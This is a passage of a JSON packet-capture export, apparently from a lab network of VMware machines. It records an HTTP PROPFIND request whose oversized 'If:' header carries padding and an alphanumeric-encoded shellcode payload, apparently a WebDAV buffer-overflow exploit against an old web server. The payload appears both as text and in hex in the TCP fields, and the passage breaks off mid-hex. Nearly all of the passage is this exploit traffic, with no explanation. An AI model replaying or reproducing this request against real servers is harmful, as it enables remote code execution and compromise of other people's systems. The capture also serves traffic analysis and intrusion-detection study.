"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:48:50:54:74:4d:64:54:75:76:63:4f:6c:79:6f:4a:75:6b:42:77:61:4e:68:54:76:74:41:71:58:4c:79:6b:4a:72:72:75:6c:53:61:73:61:57:79:52:6b:45:4c:44:51:7a:43:69:78:54:79:6d:4c:70:58:58:6f:68:7a:67:6b:63:52:54:42:5a:71:55:79:e6:99:b7:e4:89:85:e4:99:ab:e4:b9:87:e6:bd:8e:e7:81:99:e6:a5:96:e5:a1:92:e6:99:b1:e6:b9:93:e5:a5:84:e6:bd:ba:e5:99:b9:e5:8d:87:e4:a5:82:e6:a1:ac:c8:82:c8:82:e1:8b:80:e6:a0:83:e5:95:94:e6:bd:ab:e4:95:87:e7:9d:86:e7:a9:aa:e6:bd:a3:e7:85:8e:e5:85:b4:e5:81:a7:e6:a5:ac:e7:91:b5:e7:9d:a7:e4:85:91:e7:81:9a:e4:b1:b2:e6:b5:ba:e6:9d:a3:e6:a9:b7:e4:bd:8a:e6:9d:b6:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:4f:50:77:48:4d:54:48:79:6d:4f:49:4c:69:4a:72:48:43:4a:44:55:65:48:43:65:59:71:63:62:75:45:4e:77:75:65:77:4b:73:7a:4d:4e:69:63:4d:6f:41:54:6d:45:41:6c:76:71:50:79:7a:6c:46:49:42:45:71:78:48:44:4d:46:52:4c:4e:6f:64:56:e7:a5:b4:e4:bd:98:e7:81:8e:e4:95:a1:e5:91:8e:e4:b1:93:e5:91:8c:e6:b1:b8:e5:81:8a:e6:99:97:e6:b9:87:e4:bd:ad:e4:9d:99:e6:a1:b9:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:b9:93:e4:b9:b1:e5:85:b4:e5:85:a7:e1:8f:80:e6:a0:83:e6:ad:8e:e6:bd:91:e6:b1:8e:e5:99:a9:e4:ad:b3:e5:a5:b0:e6:b1:b0:e6:b9:94:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/HPTtMdTuvcOlyoJukBwaNhTvtAqXLykJrrulSasaWyRkELDQzCixTymLpXXohzgkcRTBZqUy<55><79><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/OPwHMTHymOILiJrHCJDUeHCeYqcbuENwuewKszMNicMoATmEAlvqPyzlFIBEqxHDMFRLNodV<64><56><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "519"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.881467000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.881467000",
|
||
"frame.time_delta": "0.000006000",
|
||
"frame.time_delta_displayed": "0.004177000",
|
||
"frame.time_relative": "17.132407000",
|
||
"frame.number": "526",
|
||
"frame.len": "271",
|
||
"frame.cap_len": "271",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "257",
|
||
"ip.id": "0x0000068b",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00002a05",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "34699",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "34699",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "75",
|
||
"tcp.len": "205",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "4188736826",
|
||
"tcp.nxtseq": "1654",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "2861426099",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000a4f0",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:91:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:91:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868689",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000379000",
|
||
"tcp.analysis.bytes_in_flight": "1653",
|
||
"tcp.analysis.push_bytes_sent": "1653"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000594000",
|
||
"tcp.time_delta": "0.000006000"
|
||
},
|
||
"tcp.payload": "51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "525",
|
||
"tcp.segment": "526",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1653",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:72:66:49:46:4a:71:5a:75:79:75:77:4a:63:4d:6d:41:4f:74:61:43:5a:5a:49:58:70:4f:4e:6c:59:69:46:56:6a:58:49:76:45:65:5a:69:4f:76:52:45:78:56:61:62:6c:6c:67:49:67:69:52:5a:6c:77:6f:64:42:79:43:51:53:58:7a:71:79:7a:4f:e6:a1:88:e5:85:90:e7:95:aa:e6:a9:b4:e6:89:a9:e6:85:a2:e4:9d:96:e4:a5:95:e7:a1:ba:e4:ad:89:e4:99:b3:e4:a9:a1:e7:91:88:e7:a9:a8:e5:a1:92:e5:95:b1:c8:82:c8:82:e1:8b:80:e6:a0:83:e4:9d:8b:e4:a9:8a:e4:b1:a2:e7:91:b6:e6:b1:90:e4:99:83:e5:81:95:e5:8d:b7:e4:a5:a9:e6:ad:ab:e7:89:a9:e6:99:87:e6:95:96:e6:b9:a9:e7:99:b2:e4:a5:85:e5:8d:b3:e6:9d:b3:e6:a5:87:e6:a5:90:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:68:6a:70:4b:51:4b:73:4f:48:58:70:62:47:48:55:58:42:6a:4e:53:51:57:6c:74:45:4a:71:76:6b:43:50:4e:77:67:65:48:44:7a:4c:74:4a:44:55:44:43:4c:73:58:65:78:76:53:5a:61:65:65:75:48:57:50:6f:59:6c:70:6f:77:47:68:4e:45:45:e5:99:aa:e7:a1:b7:e7:89:ad:e4:b5:a1:e4:89:aa:e5:9d:8b:e6:b9:86:e7:89:b4:e5:91:b8:e6:b9:8b:e6:89:b2:e5:81:b7:e4:a5:a9:e7:81:95:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e5:a5:a7:e5:8d:83:e7:81:ba:e7:89:a9:e1:8f:80:e6:a0:83:e7:a9:82:e6:8d:b4:e5:89:83:e4:91:85:e5:a1:aa:e5:8d:a3:e6:99:87:e7:81:97:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57: